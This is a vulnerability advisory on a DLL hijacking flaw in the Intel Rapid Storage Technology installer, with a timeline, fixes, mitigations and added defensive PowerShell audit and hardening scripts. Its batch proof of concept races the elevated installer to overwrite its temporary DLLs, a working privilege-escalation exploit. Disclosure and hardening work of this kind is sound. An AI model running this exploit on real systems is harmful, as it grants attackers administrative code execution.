
Intel Rapid Storage Technology User Interface And Driver DLL Hijacking

Posted Nov 16, 2018
Authored by Stefan Kanthak

Intel Rapid Storage Technology User Interface and Driver version suffers from a DLL hijacking vulnerability.

tags | exploit
systems | windows
MD5 | 588da88e53e05773cd51de3eafe1fcb5

Hi @ll,

the executable installer of the
Intel(r) Rapid Storage Technology (Intel(r) RST) User Interface and Driver,
version (LATEST for Windows 7), released 11/14/2017, available
from <https://downloadmirror.intel.com/27400/eng/SetupRST.exe>,
is (SURPRISE!) vulnerable!

CVSS score: 7.5/HIGH CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

See Intel's security advisory SA-00153

Vulnerability #1:

Although running with ELEVATED (administrative) privileges
(the "application manifest" embedded in SetupRST.exe specifies
"requireAdministrator"), on STANDARD installations of Windows,
i.e. where the user account created during Windows setup is used,
the executable installer creates an UNPROTECTED subdirectory
IIF<abcd>.tmp in the user's %TEMP% directory.

For this well-known and well-documented vulnerability class see
<https://cwe.mitre.org/data/definitions/377.html> and
<https://cwe.mitre.org/data/definitions/379.html>.

The subdirectory IIF<abcd>.tmp inherits the NTFS ACLs from its
parent %TEMP%, allowing "full access" for the unprivileged
(owning) user, who can replace/overwrite the DLLs (Resource.dll
and IntelCommon.dll, see the proof of concept below) which the
installer later loads and executes, in the window between their
creation and use.
Since these DLLs are executed with administrative privileges, this
vulnerability results in arbitrary code execution WITH escalation
of privilege.

NOTE: the precondition "user account created during Windows setup"
is met on typical installations of Windows: according to
Microsoft's own security intelligence reports, about 1/2 to
3/4 of the about 600 million Windows installations which send
telemetry data have only ONE active user account.

Demonstration/proof of concept:

1. visit <https://skanthak.homepage.t-online.de/sentinel.html>,
then download SENTINEL.DLL and save it in an arbitrary directory;

2. save the following batch script in the same directory:

--- IIF.CMD ---
@Rem wait until the elevated installer has created its temporary directory
:WAIT
@If Not Exist "%TEMP%\IIF????.tmp" Goto :WAIT
@Rem capture the name of the IIF????.tmp directory
For /D %%! In ("%TEMP%\IIF????.tmp") Do Set IIFTMP=%%!
@Rem overwrite the resource DLL and every IntelCommon.dll before the installer loads them
Copy /Y SENTINEL.DLL "%IIFTMP%\Resource.dll"
For /R "%IIFTMP%" %%! In (IntelCommon.dll) Do Copy /Y SENTINEL.DLL "%%!"
--- EOF ---

3. start the batch script per double-click;

4. execute SetupRST.exe: notice the message boxes displayed from
the replaced DLLs.
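
The proof of concept above overwrites the DLLs. The following PowerShell
script is an added example, not part of the advisory: a non-destructive
check that watches %TEMP% for the IIF????.tmp directory, reports whether
the current standard user could write into it, and lists the DLLs the
elevated installer drops there. It assumes it is run from the unprivileged
user's session while SetupRST.exe is started (elevated) in parallel; the
function names are this example's own.

```powershell
# Added example (not from the advisory): audit the race window instead of
# exploiting it. Run as the standard user, then start SetupRST.exe elevated.
Set-StrictMode -Version Latest

function Test-UserWritable {
    # True if an Allow ACE grants the current user, or one of its groups, a
    # right that lets it create, replace or delete files. Deny ACEs are not
    # evaluated; this is a quick audit, not a full access check.
    param([Parameter(Mandatory)][string]$Path)
    $id    = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $sids  = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })
    $write = [System.Security.AccessControl.FileSystemRights]'CreateFiles, CreateDirectories, Delete, DeleteSubdirectoriesAndFiles, ChangePermissions, TakeOwnership'
    $acl   = Get-Acl -LiteralPath $Path
    foreach ($ace in $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])) {
        if ($ace.AccessControlType -ne [System.Security.AccessControl.AccessControlType]::Allow) { continue }
        if ($sids -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band [int]$write) -ne 0) { return $true }
    }
    return $false
}

function Watch-InstallerTemp {
    # Polls %TEMP% for directories matching the installer's naming pattern
    # and reports each new one once, together with the DLLs it receives.
    param([string]$Root = $env:TEMP, [string]$Pattern = 'IIF????.tmp', [int]$Seconds = 180)
    $seen     = @{}
    $deadline = (Get-Date).AddSeconds($Seconds)
    Write-Host "Watching $Root for $Pattern for $Seconds seconds ..."
    while ((Get-Date) -lt $deadline) {
        foreach ($dir in Get-ChildItem -LiteralPath $Root -Directory -Filter $Pattern -ErrorAction SilentlyContinue) {
            if ($seen.ContainsKey($dir.FullName)) { continue }
            $seen[$dir.FullName] = $true
            $writable = Test-UserWritable -Path $dir.FullName
            $owner    = (Get-Acl -LiteralPath $dir.FullName).Owner
            Write-Host ('{0}: owner={1} user-writable={2}' -f $dir.FullName, $owner, $writable)
            # the DLLs are extracted right after the directory appears
            Start-Sleep -Milliseconds 500
            Get-ChildItem -LiteralPath $dir.FullName -Recurse -Filter '*.dll' -ErrorAction SilentlyContinue |
                ForEach-Object { Write-Host ('  DLL: {0}' -f $_.FullName.Substring($Root.Length + 1)) }
            if ($writable) {
                Write-Warning "$($dir.Name): a standard user can overwrite these DLLs before the elevated installer loads them (CWE-377/CWE-379)."
            }
        }
        Start-Sleep -Milliseconds 100
    }
}

Watch-InstallerTemp
```

A directory created by an elevated process that shows up as user-writable
here is exactly the precondition of vulnerability #1; the DLL names listed
are the candidates for replacement.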


Fix:

1. ALWAYS specify a PROPER "security descriptor" when you create
(temporary) files or directories in potentially unsafe (i.e.
user-writable) paths like the %TEMP% directory!
See <https://msdn.microsoft.com/en-us/library/aa363855.aspx>
and use the second parameter of CreateDirectory() to properly
restrict the permissions when running elevated!

2. NEVER load resource(-only) DLLs for execution!
See <https://msdn.microsoft.com/en-us/library/ms684179.aspx>
and use the third parameter of LoadLibraryEx() to specify
LOAD_LIBRARY_AS_DATAFILE or LOAD_LIBRARY_AS_IMAGE_RESOURCE, so that
the DLL is mapped as data and its DllMain() is never executed!
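
The two developer-side fixes, as an added PowerShell example that is
neither the advisory's nor Intel's code: the .NET/Win32 calls correspond
to CreateDirectory() with an explicit security descriptor and to
LoadLibraryEx() with the data-file flags. It assumes it is run elevated
(the protected directory admits only SYSTEM and Administrators); the
function names and the use of kernel32.dll as sample DLL are this
example's choices.

```powershell
# Added example (not from the advisory): the vulnerable and the fixed way
# to create an installer temp directory, plus loading a resource DLL as data.
Set-StrictMode -Version Latest
$ErrorActionPreference = 'Stop'

function New-InheritingDirectory {
    # Equivalent of CreateDirectory(path, NULL): the directory inherits the
    # DACL of its parent. Under %TEMP% the owning standard user ends up with
    # full control over whatever the elevated installer drops there.
    param([Parameter(Mandatory)][string]$Path)
    New-Item -ItemType Directory -Path $Path | Out-Null
    return (Get-Acl -LiteralPath $Path)
}

function New-ProtectedDirectory {
    # Equivalent of CreateDirectory(path, &sa) with sa.lpSecurityDescriptor
    # built from the SDDL below: the DACL is applied by the create call itself,
    # so there is no window with the inherited ACL. D:P = protected (no
    # inheritance), SY = LocalSystem, BA = Administrators, OICI = inherit to
    # files and subdirectories, FA = full access.
    param([Parameter(Mandatory)][string]$Path)
    $sddl = 'D:P(A;OICI;FA;;;SY)(A;OICI;FA;;;BA)'
    $security = New-Object System.Security.AccessControl.DirectorySecurity
    $security.SetSecurityDescriptorSddlForm($sddl)
    if ($PSVersionTable.PSEdition -eq 'Core') {
        # PowerShell 7 / .NET: extension method in System.IO.FileSystem.AccessControl
        [System.IO.FileSystemAclExtensions]::CreateDirectory($security, $Path) | Out-Null
    } else {
        # Windows PowerShell 5.1 / .NET Framework
        [System.IO.Directory]::CreateDirectory($Path, $security) | Out-Null
    }
    return (Get-Acl -LiteralPath $Path)
}

function Show-Dacl {
    param([System.Security.AccessControl.DirectorySecurity]$Acl, [string]$Label)
    Write-Host "$Label : $($Acl.Sddl)"
    foreach ($ace in $Acl.Access) {
        Write-Host ('  {0,-5} {1,-45} {2}' -f $ace.AccessControlType, $ace.IdentityReference, $ace.FileSystemRights)
    }
}

# Fix 2: map a resource-only DLL as data. LoadLibraryEx() then performs no
# relocation, resolves no imports and never calls DllMain(), so a DLL planted
# in its place cannot execute code; resources stay readable via FindResource().
Add-Type -Namespace Win32 -Name Kernel32 -MemberDefinition @'
[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
public static extern IntPtr LoadLibraryExW(string lpFileName, IntPtr hFile, uint dwFlags);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool FreeLibrary(IntPtr hModule);
'@

function Import-ResourceDll {
    param([Parameter(Mandatory)][string]$Path)
    $LOAD_LIBRARY_AS_DATAFILE       = 0x00000002
    $LOAD_LIBRARY_AS_IMAGE_RESOURCE = 0x00000020
    $h = [Win32.Kernel32]::LoadLibraryExW($Path, [IntPtr]::Zero,
             ($LOAD_LIBRARY_AS_DATAFILE -bor $LOAD_LIBRARY_AS_IMAGE_RESOURCE))
    if ($h -eq [IntPtr]::Zero) {
        throw "LoadLibraryExW failed, error $([System.Runtime.InteropServices.Marshal]::GetLastWin32Error())"
    }
    # A data-mapped module handle has one of its two low bits set; a handle
    # from a real (executable) load never does.
    $mappedAsData = (($h.ToInt64() -band 3) -ne 0)
    [void][Win32.Kernel32]::FreeLibrary($h)
    return $mappedAsData
}

$base = Join-Path $env:TEMP ('IIF' + [guid]::NewGuid().ToString('N').Substring(0, 4) + '.tmp')
Show-Dacl (New-InheritingDirectory "$base.unsafe") 'inherited DACL (vulnerable)'
Show-Dacl (New-ProtectedDirectory  "$base.safe")   'explicit DACL  (fixed)'
Remove-Item -LiteralPath "$base.unsafe", "$base.safe" -Recurse -Force -ErrorAction SilentlyContinue
"kernel32.dll mapped as data only: " + (Import-ResourceDll "$env:SystemRoot\System32\kernel32.dll")
```

Creating the directory first and tightening its ACL afterwards (New-Item
followed by Set-Acl) would leave a shorter but still real window; passing
the descriptor into the create call is what closes it.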


Mitigation(s):

1. DON'T use executable installers; stay far away from such
eternally vulnerable crap!

2. NEVER run executable installers in unsafe environments,
especially NEVER from UNSAFE directories like "%TEMP%\"!

3. DISABLE execution of files (via NTFS ACL, as shown below) in
the system's and every user's %TEMP% and every %USERPROFILE%
(see <https://skanthak.homepage.t-online.de/SAFER.html>)!

4. Practice STRICT privilege separation: use your privileged
"Administrator" account (especially the account created during
Windows setup) ONLY for administrative tasks, and COMPLETELY
separate unprivileged user accounts, with elevation requests
DISABLED, for your everyday/regular work.

Vulnerability #2:

A variant of #1, resulting in denial of service.

Demonstration/proof of concept:

1. add the NTFS access control list entry (D;OIIO;WP;;;WD), meaning
"deny execution of files in this directory for everyone,
inheritable to all subdirectories", to the (user's) %TEMP% directory;

NOTE: this does NOT need administrative privileges!

2. execute SetupRST.exe: notice the message box
"error loading language resource" displayed.
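
Mitigation 3 and step 1 of this proof of concept are the same ACL change.
The following PowerShell script is an added example, not part of the
advisory: it adds the ACE (D;OIIO;WP;;;WD) to %TEMP% through the typed
FileSystemAccessRule API instead of editing the SDDL string, verifies it
landed, shows that an .exe copied into %TEMP% no longer starts, and can
remove the ACE again. As the advisory notes, this needs no administrative
rights because the user owns %TEMP%. The function names and the use of
where.exe as a harmless test binary are this example's choices.

```powershell
# Added example (not from the advisory): deny execution of files below %TEMP%.
Set-StrictMode -Version Latest
$ErrorActionPreference = 'Stop'

# (D;OIIO;WP;;;WD): Deny, ObjectInherit + InheritOnly, FILE_EXECUTE, Everyone
$Everyone = New-Object System.Security.Principal.SecurityIdentifier('S-1-1-0')
$DenyExec = New-Object System.Security.AccessControl.FileSystemAccessRule(
    $Everyone,                                                          # WD
    [System.Security.AccessControl.FileSystemRights]::ExecuteFile,      # WP
    [System.Security.AccessControl.InheritanceFlags]::ObjectInherit,    # OI
    [System.Security.AccessControl.PropagationFlags]::InheritOnly,      # IO
    [System.Security.AccessControl.AccessControlType]::Deny)            # D

function Test-DenyExecuteAce {
    # The SDDL rendering is the quickest cross-check against the advisory's ACE.
    param([string]$Path = $env:TEMP)
    return ((Get-Acl -LiteralPath $Path).Sddl -like '*(D;OIIO;WP;;;WD)*')
}

function Add-DenyExecuteAce {
    param([string]$Path = $env:TEMP)
    $acl = Get-Acl -LiteralPath $Path
    $acl.AddAccessRule($DenyExec)
    Set-Acl -LiteralPath $Path -AclObject $acl
    return (Test-DenyExecuteAce -Path $Path)
}

function Remove-DenyExecuteAce {
    param([string]$Path = $env:TEMP)
    $acl = Get-Acl -LiteralPath $Path
    [void]$acl.RemoveAccessRule($DenyExec)
    Set-Acl -LiteralPath $Path -AclObject $acl
    return (-not (Test-DenyExecuteAce -Path $Path))
}

function Test-ExecutionBlocked {
    # Copies a harmless system binary into $Path and tries to start it. With
    # the inherited deny ACE in place, process creation fails with access denied.
    param([string]$Path = $env:TEMP)
    $exe = Join-Path $Path ('noexec-' + [guid]::NewGuid().ToString('N') + '.exe')
    Copy-Item -LiteralPath "$env:SystemRoot\System32\where.exe" -Destination $exe
    try {
        $null = Start-Process -FilePath $exe -ArgumentList '/?' -WindowStyle Hidden -PassThru -Wait
        return $false
    } catch {
        return $true
    } finally {
        Remove-Item -LiteralPath $exe -Force -ErrorAction SilentlyContinue
    }
}

'execution from %TEMP% blocked before: ' + (Test-ExecutionBlocked)
'deny-execute ACE present after add  : ' + (Add-DenyExecuteAce)
'execution from %TEMP% blocked after : ' + (Test-ExecutionBlocked)
# Remove-DenyExecuteAce   # undo, e.g. before deliberately running a trusted installer
```

With the ACE in place SetupRST.exe fails as described in step 2, because the
DLLs it extracts into %TEMP%\IIF<abcd>.tmp inherit the deny and cannot be
mapped for execution; that is the denial of service, and the same ACE is
what keeps a planted DLL from running in vulnerability #1.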


Fix:

Create (temporary) files and directories with PROPER permissions!
See above.

stay tuned
Stefan Kanthak


Timeline:

2018-06-06 vulnerability report sent to vendor

2018-06-10 Intel acknowledges receipt

2018-06-14 Intel confirms reported vulnerability

2018-10-26 CVE-2018-3635 assigned

2018-11-13 Intel publishes security advisory SA-00153

2018-11-16 vulnerability report published


© 2019 Packet Storm. All rights reserved.